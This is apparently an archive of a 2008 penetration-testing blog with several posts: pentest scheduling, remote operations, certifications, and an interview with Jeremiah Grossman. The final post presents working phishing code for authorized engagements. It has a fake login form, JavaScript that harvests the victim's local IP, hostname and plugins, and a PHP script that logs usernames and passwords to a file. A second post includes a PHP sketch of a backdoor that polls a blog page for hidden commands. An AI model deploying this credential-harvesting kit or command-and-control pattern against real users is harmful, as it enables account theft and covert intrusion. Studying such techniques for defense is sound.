Wednesday, April 30, 2008

Penetration Testing Scheduling


There is a thread over on the pentest list about Penetration Testing Scheduling
http://seclists.org/pen-test/2008/Apr/index.html#135

The question posed was "I've heard a lot of folks say that telling your customers exactly when you will begin the testing is not suitable, but I'm not sure as to why they say that... Can anyone define for me the right approach? -- Do you plan the assessment and let them know it's within a week or so, or do you simply inform them the date and time specifically?"

The obvious answer to this question is that it depends on the scope and the ROE (rules of engagement).

If the client is testing to see how far you can go with a single shell/vulnerability/phish attack, or how (and if) an IDS/Incident Response team reacts to your scans or attacks, then it wouldn't make sense to tell them your hours of operation. Your "guy" inside should probably know what's going on, or at least be able to call you for deconfliction if necessary, but in that situation you certainly wouldn't want an email going out to all users or all admins telling them to ignore all malicious traffic coming from IP W.X.Y.Z.

There is also good reason not to give specifics because people tend to go on a patch frenzy right before, or even worse during, your pentest. Nothing sucks more than coming back the next day to find that a vulnerable host was patched overnight, especially when it was some old-ass exploit like MS06-040 or DCOM. Hope you already did all your data mining!

But if you are there to find EVERY damn vulnerability you can, everyone knows you are there, and you are probably going to run with credentials to check patch versions and whatnot, then I don't see any reason not to tell people your schedule, if only to minimize undue stress or freaking out by the IDS/IH team.

The first two examples simulate a determined attacker and aren't necessarily there to find EVERY vulnerability on a network. I personally feel most organizations can get most of the low-hanging fruit like that themselves by running Nessus or vulnerability scanner X on their network. You don't need to bring someone in to run Nessus, but I'll gladly do it and take your money.

A pentest should be another set of eyes: to see what you missed, to see what can happen once that initial foothold is gained, and to test the "exploitability" of vulnerabilities, things that scanners cannot and do not do.
CG

Sunday, April 20, 2008

Remote Ops and Pentesting


I'm trying to catch up on some posting, hopefully Jesus doesn't mind me using his day to do that...

On the last assessment I was on, I was on the "remote" end of the shell. We had people in another state doing the on-site work and sending shells back, so we could simulate both remote and local attackers.

Interesting things come up when you have people looking for your outbound shell, mostly: WTF do you do when your connect-back domain name is poisoned or your IP is blocked, and how do you hide that traffic? Maybe in some cases that 3am hack session ISN'T such a good idea; better to blend in with the morning check-your-email traffic.

At BH D.C., Sinan Eren gave his IO Immunity Style talk. It was a good talk, and interesting considering they were able to take all the time they needed and 0day was OK. Most importantly, though, was their backdoor PINK. PINK helps solve some of the C&C problems with botnets or even backdoors, namely: how do I keep tabs on the boxes even though I don't necessarily want them to do anything yet? PINK had a pretty cool way of doing that: you put commands on a blog (signed and encrypted... booyah) and the backdoor would go out and query that page for what to do next. It would also only do those queries if there was activity on the box; I don't remember if it was network activity or just keyboard/mouse activity, but either way it was a good idea. Only sending web traffic when someone is actually logged in is definitely a better way to blend in.

Tom Liston also talked about some malware at last year's ChicagoCon that would query a website and get its commands from comments in the HTML code; again, pretty slick.
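To make the idea concrete, here is a bare-bones sketch of that style of check-in. This is not PINK and not the malware from the ChicagoCon talk, just the general concept in PHP; the URL, the <!-- cmd: --> marker, and the "activity" check are all made up for the example.

<?php
// Bare-bones sketch of the "commands hidden in a web page" check-in idea.
// Not PINK and not Tom Liston's example -- the URL and comment marker are invented.

$c2_url = 'http://blog.example.com/2008/04/some-post.html';  // page the operator controls

// PINK-style twist: only phone home while the box looks "in use". A real
// implementation would watch keyboard/mouse or network activity; we just
// fake it with a boolean so the sketch stays short.
$user_is_active = true;

if ($user_is_active) {
    $page = @file_get_contents($c2_url);   // looks like ordinary web browsing
    if ($page !== false && preg_match('/<!--\s*cmd:(.*?)-->/s', $page, $m)) {
        $command = trim($m[1]);
        // A real implementation would verify a signature on the tasking
        // (PINK's were signed and encrypted) before acting on it.
        echo "tasking received: $command\n";
    }
}
?>

The nice part, as both talks pointed out, is that from the network's point of view this is just an HTTP GET to a blog, which is exactly the kind of traffic that blends in with the morning email-and-coffee routine.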

So what's the point? I guess the point is: cover your ass and have multiple ways of keeping that communication going, or really know your target's monitoring capabilities so you know which method will best keep your shell alive.

useful links:

http://ha.ckers.org/blog/20080127/process-doubling/

Not so much the post itself, but the comments are good.

http://www.immunityinc.com/downloads/BeyondFastFlux.odp
mentions PINK
http://www.blackhat.com/presentations/bh-dc-08/Eren/Presentation/bh-dc-08-eren.pdf
IO Immunityinc style talk
CG

WTF Business Software Alliance


Have things really come down to this???

Snitching on your company or friends for a quick buck? The irony, of course, is that the banner was on a security forum that pretty much caters to the last group of people who would pay for software.
CG

Not a CISSP ?!?!


Chris Eng over at Veracode has an interesting post on their blog about Immunity's "Not a CISSP" button.

If you've been under a rock, here is the button:


I've got mixed feelings about the button. For one thing, I've seen a couple of CISSPs wearing that button at Defcon/ShmooCon; I guess they were practicing some SE. But secondly, it's easy for people in the top 5% of the security game to say you don't need certifications, because they (most importantly) already have that level of experience and name recognition. Dave Aitel doesn't need to take a test and throw some letters after his name to prove to anyone he knows his stuff; he proved himself long ago. But I can't imagine he came out of the womb with that much fu. Maybe he did, I don't know.

For us mere mortals who are just trying to get a paycheck and some experience, a lot of places are requiring certifications to be on the contract, to get the job, or even to get your resume in front of the hiring manager. For .mil/.gov this is because of DoD 8570. To me, requiring certifications is a step in the right direction. Since no one has come forward with a scalable "hands-on" way to certify people, that paper test (for now) will have to do. At least people are trying to get qualified people into the slots; saying a CISSP or some other cert makes you automatically qualified is another matter.

I'll be the first one to agree with Chris that, "like many security certifications, it’s an ineffective measure of a security professional’s practical abilities." See my CEH != Competent Pentester post, but the game is the game. If you have to sit for a test to do or get the job, then stop bitching, take your test, and move on with it. If you want to stand your ground and just bitch and not get the job, enjoy your time on the Geek Squad.
CG

Wednesday, April 16, 2008

LSO quoted on security.magnus.de


Hey LearnSecurityOnline.com got a shoutout on security.magnus.de

http://security.magnus.de/artikel/sicherheitstests-security-check-mit-metasploit-3-meterpreter.html

translated

translated quote:

" How can I get power over foreign computer? --That is a central question of all crackers. Exploits are the answer: They bring a computer cracker, to do what they want. So says the computer security side Learn Security Online www.learnsecurityonline.com together."

Not sure where he got the quote, but hey, I'll take it.

original screenshot:




translated screenshot:



neat!

CG

Tuesday, April 15, 2008

4 words...Developers, Developers, Developers, Developers


Joe and I were reminiscing about Defcon X and this video. Thought I'd share it for those of you who have never seen it, or for those of you who used to rock out at Defcon and now rock out at RSA.


CG

Friday, April 11, 2008

CEH/CPTS Certification != competent pentester


Dean and I have talked about this more times than I can count, and finally a discussion has taken place over on the pentest list about automated pentesting and a pentester's experience. The thread is here: "Penetration Testing Techniques". I won't get into everything that's wrong with what's going on in that post; I'm going to harp on experience and certifications.

from thread: http://seclists.org/pen-test/2008/Apr/0039.html

"Well, the results are definitely verified through nmap as well.OS is
win 2k3 running IIS 6.0 and only 80 being open.Yes indeed the client
has assigned us the job to perform the pen test and knows about it.
I do have the CPTS training dvd and am going through that, but it will
take time to digest that horde of information.Also downloading web
goat to get my hands wet with web app testing."

While the thread is initially about CORE IMPACT not finding any vulnerabilities on this particular server, the underlying issue is someone with that little experience being hired to do a pentest. It's a recurring thread on other sites as well: "Hey, I got my CEH, who wants to hire me to be a pentester?" :-(

Bottom line: tools are just tools; they help humans get jobs done. They aren't, and shouldn't be, the only thing used on a pentest. The other point is that experience is king. Granted, the original poster is getting experience, but giving CORE to a brand-new tester is not going to help them get better. There is a reason A LOT of subjects are taught the hard way first, and only then do you get taught "the shortcut." Oh, and passing a multiple-choice test is not a real, demonstrable measure of ability.

Let me also add that if one of my employees posted some crap like that, I'd seriously be considering having them find another place to get their experience.

Want to learn the right way? Check out LearnSecurityOnline's Learning Model. LSO isn't the end-all, be-all of security, but I think the Learning Model and the Core and Advanced Competencies are a solid foundation for any security professional.

Here are the Core & Advanced Competencies:

Four Core Competencies
• Operating Systems
• Networking
• Programming
• IT/IT Security Resources

Advanced Competencies
• Documentation, Policies, Procedures, Disaster Recovery
• Cryptography
• Forensics
• Penetration Testing
• Security Industry Certifications
CG

Thursday, April 10, 2008

Interview with Jeremiah Grossman on LearnSecurityOnline.com


Originally published on LearnSecurityOnline.com

http://learnsecurityonline.com/index.php?option=com_content&task=view&id=297&Itemid=0

# LSO #
How about some background about yourself, who you are? What you do? Who you work for? Location?

# JG #
I started out as a graphic designer; turned to a Web developer then UNIX admin, then Web security guy. Today, I’m founder and CTO of WhiteHat Security, a leading provider of website vulnerability management services headquartered in Santa Clara, Ca.

I was raised in Maui, Hawaii and grew up in Silicon Valley. I’ve been commonly referred to as one of the top Web security experts, recognized as one of InfoWorld 2007 Top 25 CTOs, and all that sort of fluffy stuff. Personally, I prefer engineer and entrepreneur. My daily job consists of delivering presentations, R&D for future products and services, speaking with a lot of companies and learning about their Web security challenges, and helping out with the Web Application Security Consortium (WASC). I write a lot too. Blog, books, articles, interviews. :-)

# LSO #
How did you get into the security business (your specific field)?

# JG #
While working at Yahoo pen-testing websites, I found I had far too much work and not enough time to do it. If every one of the 600 websites took 40 hours to assess for vulnerabilities, it would take me roughly 11.5 years to finish. Unless we hired a team of 10, no solution available was going to meet our needs. This was not a problem unique to Yahoo: Many companies across the industry were experiencing the same dilemma. They know they have vulnerabilities needing to be fixed and no idea where they’re located. I saw a market opportunity, set out to build a better solution, and jumped in with both feet. WhiteHat’s executive staff envisioned a highly scalable vulnerability assessment Software-as-a-Service solution incorporating proprietary, automated scanning with expert analysis. Six years later here we are. Now, how I got my Job at Yahoo is a whole other story. ;)

http://jeremiahgrossman.blogspot.com/2007/04/how-i-got-my-start.html

# LSO #
You are considered to be one of the forerunners of Web security. I remember seeing your talk at Black Hat in 2002 when you released WhiteHat Arsenal and being totally blown away by what you could do with a web browser, and the browser has only become more and more powerful over the years. In your opinion, are we past the worst of web vulnerabilities, in the thick of it now, or is the worst yet to come?

# JG #
Wow, has it been that long? On the positive side, unless someone finds a truly new attack technique, the number of vulnerabilities in the average website will likely slowly decline in the years to come. The downside is the attackers will have a lot of green field to exploit and they haven’t even really begun to hack. Unfortunately the worst is yet to come and we’ve already seen some fairly bad stuff happen to date.

# LSO #
Web 2.0 and Ajax: is it the end of the world as we know it, or just another technology in the mix?

# JG #
Y2K didn’t end the world, so why should Web 2.0 and Ajax? Web 2.0 is the way we’re using the Web, and Ajax is a set of technologies developers used to build it. Others don’t share my view, but I don’t think either Web 2.0 or Ajax makes a website more susceptible to attack. They all have the same problems in the same ways, just a lot faster and easier to make mistakes. What has changed though is our capacity to find vulnerabilities in Ajax-laced websites. You see, the bad guys really don’t need or use scanners to hack websites because they only need to find one issue; and, it’s faster to do it by hand. The good guys on the other hand have to find all issues and protect against them all - all the time. That means the good guys need scanners to keep up. The problem with scanners though is they’ve shown to be severely lacking in Ajax support despite the marketing claims. Not to mention the volume of false positives they generate.

# LSO #
How do you think technical aspects of web hacking have changed over time and how does one keep up with the current advances?

# JG #
The basics have been the same for quite a while, but the advanced stuff is getting fairly large, sophisticated, and constantly evolving. The nuances of Web security takes a while to learn if you start from zero. The only way I’m personally able to keep up is by reading a tremendous amount and communicating as often as I can with others. So, I read white papers, mailing lists, blogs, news stories, etc. I also attend conferences, contribute to community projects, and utilize email quite heavily.

# LSO #
Say I want to get into web security. It's HUGE; where do I start?

# JG #
At the beginning! No seriously. If I had to start again, the first thing I’d do is pick up a programming language like Java or C# and develop my own super simple Web applications to get the basic concepts. Then, I’d seek to understand how the Web is architecturally put together from the ground up. That means learning everything I could about TCP/IP, HTTP, DNS, SSL, and general encryption. I’d make my own Web servers and Web browsers, create little tools to create packets in the various protocol layers, and basically play around with all the technology till I felt really comfortable. Then, I’d work my way back up the stack learning HTML, JavaScript, and the DOM, all the while making little applications to keep my interest. But, what you’re probably asking at this point is “where is the security,” right?

From my point of view, security is a state of mind more than anything else. I’ve always felt that if I understood all aspects of the technology to an intimate degree, then “security” portions became super easy. If I knew how everything worked, was meant to work, then I could proceed to test if I could make it work in ways other than intended.

Some early books on my bookshelf:

The Protocols (TCP/IP Illustrated, Volume 1)
http://www.amazon.com/Protocols-TCP-IP-Illustrated/dp/0201633469/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682211&sr=8-1

TCP/IP Network Administration (3rd Edition; O'Reilly Networking)
http://www.amazon.com/TCP-Network-Administration-OReilly-Networking/dp/0596002971/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682225&sr=8-1

UNIX System Administration Handbook (3rd Edition)
http://www.amazon.com/UNIX-System-Administration-Handbook-3rd/dp/0130206016/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682255&sr=8-1

Applied Cryptography: Protocols, Algorithms, and Source Code in C, Second Edition
http://www.amazon.com/Applied-Cryptography-Protocols-Algorithms-Source/dp/0471117099/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682281&sr=8-1

DNS and BIND
http://www.amazon.com/DNS-BIND-5th-Cricket-Liu/dp/0596100574/ref=pd_bbs_2/104-1693213-7738351?ie=UTF8&s=books&qid=1193682300&sr=8-2

Mastering Regular Expressions
http://www.amazon.com/Mastering-Regular-Expressions-Jeffrey-Friedl/dp/0596528124/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682314&sr=8-1

JavaScript: The Definitive Guide
http://www.amazon.com/JavaScript-Definitive-Guide-David-Flanagan/dp/0596101996/ref=pd_bbs_sr_1/104-1693213-7738351?ie=UTF8&s=books&qid=1193682325&sr=8-1


# LSO #
You mention the disclosure dilemma in your interview with Colleen Frye. What are your thoughts on disclosure? I think it's a double-edged sword because, let's face it, 0-days and worms keep system admins, network managers, pen-testers, and consultants in business, but it seems a lot of vendors are pushing the no-disclosure (or disclose-only-to-us) route.

# JG #
For the most part, I’m in the non-disclosure camp. Meaning: I only privately disclose vulnerabilities when I have a good working relationship with the other party. And, if I release something publicly, it’s only because I feel the attack technique is new and has further implications that would benefit by public research. Be mindful though that I would not recommend people blindly follow my philosophy. Instead, they should find a system that works within their personal code of ethics, morals, professionalism, and level of risk acceptance. Because let’s face it, the industry is not what it used to be 10 to 15 years ago and already has pushed much of the research underground.

# LSO #
Do you think that's good for the industry? Is it good to push all that research underground?

# JG #
I take a pragmatic approach to security and I feel that business owners and software vendors have a responsibility for the data they protect and the products they sell. We all must take into consideration the environment around us, and understand that it’s hostile. We should have no expectation that anyone is going to share any vulnerability information ahead of time. We can hope they will before going public. But, do not depend on it and frankly it’s hopeless to demand it.

# LSO #
On a similar note, what are your thoughts on the German anti-hacking laws, and what do you think would happen to the security industry if the US went that route?

# JG #
I don’t think we have to wait for that to happen; it’s probably already here and we just haven’t realized it. When considering our current political climate and recent legal changes in the U.S., it seems to me that any one of us could easily be accused of committing an illegal act and be held to account. All that really has to happen is a few more high-profile prosecutions of security researchers to have a nasty and lasting side effect. What I do think is coming is export controls placed on vulnerability information (0-days), just like they do on encryption - because of their potential impact on national security. It’s a brave new world.

# LSO #
Do you think JavaScript is the new shellcode? If so why?

# JG #
Yes, definitely, because Cross-Site Scripting is the new buffer overflow. ;)

# LSO #
Tell us what you think of the future of network enumeration via JavaScript. What are the attacks that we should look for in the coming years from JavaScript?

# JG #
It’s difficult predicting the future in security, but if I had to guess, I could see phishers using XSS a lot more. The malware guys will continue defacing highly trafficked and trusted websites to exploit their visitors’ Web browsers. And the high-end espionage attack types will go for the Intranet hacking stuff using JavaScript malware. It’s the latter that’ll be hard to track, measure, and defend.

# LSO #
Can you compare/rate the criticality of XSS, XSRF, SQLI?

# JG #
Unfortunately no. It’s hard to generalize their severity, criticality, threat, etc. For the most part, website vulnerabilities have to be rated individually, while taking into consideration the value of the website, the data it contains, and the sophistication of the attack required.

# LSO #
Have you, or anyone you are aware of, made any progress on your non-JavaScript port scanning idea that you posted here:
(http://jeremiahgrossman.blogspot.com/2006/11/browser-port-scanning-without.html)

# JG #
Ilia Alshanetsky certainly took the next step by improving the speed of my original designs, but I think I’ve personally taken that concept about as far as I need to. The Intranet zone has been breached and the rest just seems to be adding insult to injury. No need to make exploitation easy for the bad guys. It’s the browser vendors’ turn to remediate the problem architecturally.

# LSO #
How real of an attack vector is DNS-Rebinding? How prevalent do you think it is in the wild?

# JG #
DNS-Rebinding (Anti-DNS Pinning) spent several years in the realm of theoretical obscurity, but that changed recently when more researchers demonstrated creative proofs of concept. It’s a very powerful attack vector with a lot of potential for damage. Worse still, I think the browser vendors are at a loss for how to deal with the problem. It’s also difficult to tell if the bad guys are using this in the wild maliciously. Unfortunately, we’ll know when the side effects get really bad and we find the attack being used in a piece of malware.

# LSO #
Are people really vulnerability scanning internal networks with Nessus/Metasploit through a socks proxy?

# JG #
Not that I’m aware of.

# LSO #
Can you tell us a little bit about WhiteHat Sentinel? Have appliances taken the human out of the network security and web security loop (minus the people writing the checks for the appliances)?

# JG #
Nah, human expertise will be a vital part of any comprehensive Web application vulnerability assessment process, forever. Unless of course someone solves the halting problem or websites magically become “secure enough”, but I doubt it.

WhiteHat Sentinel is a website vulnerability assessment and management service that is customer controlled and expert managed. Without the marketing-fu, that means our customers websites receive a complete vulnerability assessment whenever they’d like or as often as their website changes, with the security of knowing they have the expertise of WhiteHat engineers as support. Presently, we’re performing hundreds of vulnerability assessments each week, many orders of magnitude above anyone else, with the significant added benefit of the false positives weeded out. To deliver this type of service is no small task and it’s really our SaaS technology that enables WhiteHat to have this incredibly efficient process. Our remotely hosted vulnerability scanning infrastructure does all the heavy lifting and also allows us to configure custom tests for each website to identify those pesky business logic flaws.

# LSO #
What can I do to keep mom and dad safe on the net? Or anyone who gives you the "huh?" when you go into phishing, hacking, XSS, CSRF, malware, etc.?

# JG #
The most effective way to keep them safe is to switch them to a Mac. Sorry Windows people, but your operating system is target #1. And, for the same reason, swap out Internet Explorer for Firefox, Mozilla, or Opera. These two acts alone will significantly reduce the likelihood of their machine getting hacked. Then disable ActiveX, Java, and, unless they really complain about it, Flash too. And, for good measure, install SafeHistory and Adblock Plus. To keep them from getting phished, teach them to be skeptical of any email from someone they don’t know, especially the ones with links and/or attachments. Instead of clicking on links in their email, set up a list of bookmarks to select for their bank and other important business-oriented websites.

# LSO #
How important do you feel programming is for this field, specifically Web-language programming? If it is, what language(s) do people need to know well?

# JG #
The best Web security experts, in my experience, have a Web development background. Most any Web language works just fine, since we’re all niche practitioners anyway. HTML/JavaScript are a must no matter what. But if you had to start now, .NET and Java and their development frameworks are what you need to know to an intimate degree.

# LSO #
What tools need to be in every web application pen-tester's toolkit?

# JG #
Three different Web browsers (at least), a proxy or two, and some text encoders and decoders.
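(A quick aside, not part of Jeremiah's answer: the "text encoders and decoders" piece can literally be a few lines of script you keep handy. Here is a throwaway PHP example of the sort of helper he means; the file name and the set of operations are made up for illustration.)

<?php
// codec.php -- throwaway encode/decode helper for web app testing.
// Usage: php codec.php urlencode "<script>alert(1)</script>"

if ($argc < 3) {
    die("usage: php codec.php <op> <string>\n");
}
$op    = $argv[1];
$input = $argv[2];

switch ($op) {
    case 'urlencode':  echo urlencode($input);                break;
    case 'urldecode':  echo urldecode($input);                break;
    case 'b64encode':  echo base64_encode($input);            break;
    case 'b64decode':  echo base64_decode($input);            break;
    case 'htmlencode': echo htmlentities($input, ENT_QUOTES); break;
    case 'hexencode':  echo bin2hex($input);                  break;
    default:           echo "unknown op: $op";
}
echo "\n";
?>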

# LSO #
What are the basics that you think every security person should know?

# JG #
For me, the key things that I’ve come to appreciate are that technology skills can be learned over time, but for many it’s difficult to grasp certain fundamental information security concepts. That security is a state of mind, that it is a process and not a product, and that it is our responsibility to mitigate risk. Anyone can spend a bit of time to learn how to properly configure a firewall, but do they know why they are doing it? What are the attacks they hope to thwart or don’t address? What business challenges crop up as a result of firewall implementation?

The point is we have to question our assumptions, our conventional wisdom, and constantly check to ensure they still hold true. Often they do not.

# LSO #
Any suggestions on breaking into the security field, or for someone considering security as a career?

# JG #
Get involved in any way and at any level you can. This could be an entry-level job, contributing to a community effort, or participating in a mailing list discussion. Read everything (white papers, articles, blogs, etc.). Email the authors and ask tough questions. Attend conferences and local chapter meetings.

The whole idea is to meet people, build relationships, and learn everything you can by helping out. This also demonstrates your passion and value to those you interact with. Nothing says more to an employer (or a recruiter) than personal initiative and self-motivation.

# LSO #
Jeremiah, thanks tons for all your work in the industry and for agreeing to the interview.

Jeremiah Grossman
Blog: http://jeremiahgrossman.blogspot.com/
Book: XSS Attacks: Cross Site Scripting Attacks and Defense
CG

Saturday, April 5, 2008

Shotgun Blast 06 April 08


CG

Phishing Revisited


As Chris mentioned in a previous post, we used social engineering and phishing emails as an attack vector. The scope of the engagement prevented us from collecting any data that could be used to identify the user. The client was not out to make examples of their staff, but to see how well their education and training programs were working. I commend that approach; our goal as pentesters is not simply to own the network (well, it is :)), we are also there to provide the data and metrics to help improve the client's overall security.

But what if the scope required you to use the phishing attack to capture user data, and even possibly, as Chris stated, use the credentials of the user to dig deeper into the network?

Let's take a look at how you can use a simple page containing some JavaScript and PHP (or Perl) to accomplish this. First, let's determine what we are looking to collect from the client machine and user. One restriction is that we cannot upload anything (backdoor, etc.) to the client machine. So what can we collect? We can collect the credentials (username/password) entered by the user, the computer's hostname, the local and remote IP addresses, the Firefox plugins, and more. Let's assume that we are using the same phish as in the previous post, with the same Perl mass mailer and the same HTML pages. That's great, but how do you collect all that data?

Let's start with the page we want the user to see when they click the link in the email. We'll call it login.html, a fake login page. I will simply show the code needed to begin collecting the data; I'll leave the design and layout up to you.

A few simple text boxes and a submit button are all that is needed to begin collecting the user's username and password.
<form method="POST" name="login" action="result.php" onsubmit="return process_target()">
<table cellspacing="5" bgcolor="#C0C0C0">
<tr><td width="100">Username:</td><td><input type="text" size="20" name="username" /></td></tr>
<tr><td>Password:</td><td><input type="password" size="20" name="password" /></td></tr>
<tr><td colspan="2">&nbsp;</td></tr>
<tr><td><input type="submit" value="Login" /></td><td><a href="forgot.html">Forgot your password?</a></td></tr>
</table>
<input type="hidden" name="local_ip" />
<input type="hidden" name="hostname" />
<input type="hidden" name="plugins" />
</form>
Well, that is simple enough; we can send that data anywhere we want. If you don't mind grepping through web server logs, you don't even need to send it to another page, file, or database; you can simply search for the strings in your server logs (assuming the form submits via GET or you log request bodies). Looking at the code, you'll notice the JavaScript onsubmit event. Why? Well, this is where we begin to add to our code and start to do some cool stuff. We use the onsubmit event to call the process_target() function, and we take advantage of JavaScript's ability to invoke Java classes directly from within Firefox (LiveConnect). Specifically, we use the java.net.Socket class to determine the local IP address and hostname of the target machine. This is great if the user is behind a NAT'd firewall or router.

Originally, my code used the java.net.InetAddress class to obtain the IP address. Lenny Zeltser found that it was not always reliable and sometimes did not return an address at all during testing. Annoying! So Lenny suggested the following code, which works perfectly.

<script>
function process_target() {

window.onerror=null;

try {

var sock = new java.net.Socket();
sock.bind(new java.net.InetSocketAddress('0.0.0.0', 0));
sock.connect(new java.net.InetSocketAddress(document.domain, (!document.location.port)?80:document.location.port));
document.forms[0].local_ip.value = sock.getLocalAddress().getHostAddress();
document.forms[0].hostname.value = sock.getLocalAddress().getHostName();

for (var index = 0; index < navigator.plugins.length; index++)
document.forms[0].plugins.value = document.forms[0].plugins.value + navigator.plugins[index].name + "; ";

} catch (e) {}

}
</script>
In addition to the local IP and hostname, we are also able to enumerate the Firefox plugins (media player, QuickTime, Flash, etc.). Excellent!!

Now we need to retrieve this data, and while we're at it, let's see what other data we can determine about the remote machine. The second page, result.php, a fake login-failure page, is going to be used to receive the data from login.html and write it to a text file on our server. I normally format this page to look like a legitimate error page, with a nice message asking the user to contact the help desk.

Let's take a look at the code and how, using PHP's superglobals, we're able to capture more data about the user's environment.

<?php

$file="data.txt";
$register_globals = (bool) ini_get('register_globals');

/* Capture user-submitted data. */
$uid = $_POST['username'];
$pass = $_POST['password'];

/* Capture additional data collected via Java */
$local_ip = $_POST['local_ip'];
$hostname = $_POST['hostname'];
$plugins = $_POST['plugins'];

/* Capture environment variables */
$rem_ip = $_SERVER['REMOTE_ADDR'];
$rem_port = $_SERVER['REMOTE_PORT'];
$user_agent = $_SERVER['HTTP_USER_AGENT'];
$referer = $_SERVER['HTTP_REFERER'];
$date = date('dS \of F Y h:i:s A');

/* Write data to file */
$log=fopen("$file", "a+");
fputs($log, "DATE: $date\nUSER: $uid\nPASSWORD: $pass\nLOCAL IP: $local_ip\nREMOTE IP: $rem_ip\nPORT: $rem_port\nHOST: $hostname\nUSER AGENT: $user_agent\nREFERRER: $referer\nPLUGINS: $plugins\n\n");
fclose($log);
?>
We make use of the server variables provided by PHP. $_SERVER is an array that contains information such as headers, paths, and script locations; for additional options, check out the PHP manual here. The next step is to place a text file called data.txt on your web server. Ensure that this file is readable and writable by the web server, as result.php uses fputs() to append the results to it.
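Once responses start rolling in, it helps to pull the records back out of data.txt for the report. The little parser below was not part of the original write-up; it's just a sketch that assumes the exact field labels result.php writes above (USER:, PASSWORD:, REMOTE IP:, and so on).

<?php
// Hypothetical reporting helper -- not from the original post. Reads data.txt
// back into one array per response, keyed by the labels result.php wrote.

$records = array();
$blocks  = explode("\n\n", trim(@file_get_contents('data.txt')));

foreach ($blocks as $block) {
    $record = array();
    foreach (explode("\n", $block) as $line) {
        if (strpos($line, ': ') !== false) {
            list($key, $value) = explode(': ', $line, 2);
            $record[$key] = $value;
        }
    }
    if (!empty($record)) {
        $records[] = $record;
    }
}

printf("%d responses captured\n", count($records));
foreach ($records as $r) {
    printf("%s / %s from %s (%s)\n",
           $r['USER'], $r['PASSWORD'], $r['REMOTE IP'], $r['HOST']);
}
?>

Nothing fancy, but it saves you from eyeballing the raw text file when you are writing up the results.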

OK, let's see what we now have the ability to capture: the username and password, local and remote IP, hostname, remote port, Firefox plugins, the user-agent string, and the referrer. For good measure we collect the date and time as well, and write it all to a text file to review and use in other areas of the engagement.

I hope that helps show how simple and how powerful a phishing attack during a pentest can be. We did not even need to install a backdoor. The shift in attackers' vector of choice from remote to client-side exploits is seen in more and more cases, so it's becoming even more important that you inform your client of the dangers of client-side attacks. I've shown you two options, in this post and the previous one, that don't actually compromise the remote host but do give you valuable data to use for improving awareness programs or gaining additional access to the network.

Cheers,
Dean

dean de beer